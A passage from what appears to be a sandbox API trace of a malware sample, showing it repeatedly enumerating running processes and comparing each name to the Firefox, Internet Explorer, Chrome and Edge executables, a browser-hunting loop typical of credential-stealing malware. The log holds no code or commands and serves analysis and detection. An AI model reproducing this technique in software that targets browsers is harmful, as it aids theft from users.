lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0179.217] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0179.217] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0179.217] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.217] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0179.217] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0179.217] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0179.217] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0179.217] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.217] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.218] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0179.218] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0179.218] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0179.218] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.218] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.218] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.218] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.218] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.218] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.218] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0179.219] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0179.219] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0179.219] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0179.219] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.219] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.219] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.219] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.219] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.220] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0179.220] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0179.220] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0179.220] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.220] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.221] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.221] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.221] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.221] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.221] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.221] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.221] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.221] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.221] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.221] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.222] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0179.222] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0179.222] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0179.222] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.222] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0179.222] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0179.222] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0179.222] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.223] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.223] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.223] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.223] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.223] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.224] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.224] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.224] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.225] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.225] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.225] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.225] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.225] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0179.225] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0179.225] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0179.225] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0179.225] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0179.225] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0179.226] CloseHandle (hObject=0xd4) returned 1 [0179.226] Sleep (dwMilliseconds=0x3e8) [0180.244] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0180.246] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.247] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0180.247] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0180.247] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0180.247] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0180.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.247] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0180.247] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0180.247] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0180.247] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0180.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.248] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0180.248] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0180.248] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0180.248] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.248] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0180.248] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0180.248] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0180.248] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.249] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0180.249] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0180.249] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0180.249] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.249] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0180.249] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0180.249] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0180.249] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.250] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0180.250] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0180.250] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0180.250] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.251] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0180.251] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0180.251] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0180.251] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.251] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0180.251] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0180.251] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0180.251] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0180.252] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0180.252] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0180.252] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0180.252] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.252] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.252] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.252] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.252] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.253] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.254] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.255] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.255] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.255] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.255] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.255] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0180.255] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0180.255] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0180.255] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.256] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.257] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0180.257] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0180.257] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0180.257] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.257] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0180.257] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0180.257] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0180.258] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.258] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0180.258] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0180.258] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0180.258] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.259] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.259] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.259] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.259] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0180.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0180.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0180.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0180.260] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0180.260] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0180.260] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0180.260] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0180.260] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0180.260] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 